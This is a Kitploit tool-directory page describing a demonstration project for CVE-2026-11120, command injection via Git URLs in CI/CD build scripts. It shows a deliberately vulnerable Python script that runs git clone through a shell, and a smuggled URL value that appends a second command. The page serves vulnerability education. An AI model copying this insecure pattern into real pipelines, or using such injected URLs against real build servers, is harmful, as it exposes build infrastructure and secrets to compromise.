Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — Demonstrates command injection via unsanitized Git URLs in CI/CD pipelines, including a vulnerable build script and exploit example for a critical CVE. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
Vulnerability AnalysisExploitationDevSecOpsLearning & Education
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

Demonstrates command injection via unsanitized Git URLs in CI/CD pipelines, including a vulnerable build script and exploit example for a critical CVE.

View Repository
101 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-11120 – Command Injection via Git URL in CI/CD Pipeline

Program Code (Python)

# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – Command Injection via Git URL in CI/CD

Severity: Critical

Overview

A CI/CD pipeline script uses unsanitized user‑supplied Git repository URLs in a shell command. An attacker can inject shell commands by including special characters (e.g., ;, &&) in the URL, leading to arbitrary command execution on the build server.

Vulnerability Details

  • Type: Command Injection
  • Impact: Compromise of build infrastructure, secret leakage.
  • Root Cause: The repository URL is concatenated directly into a shell command without escaping or validation.

Exploit Demonstration

Run the vulnerable script:

python cicd_build.py

It executes the injected id command, creating /tmp/pwned.

Download Tool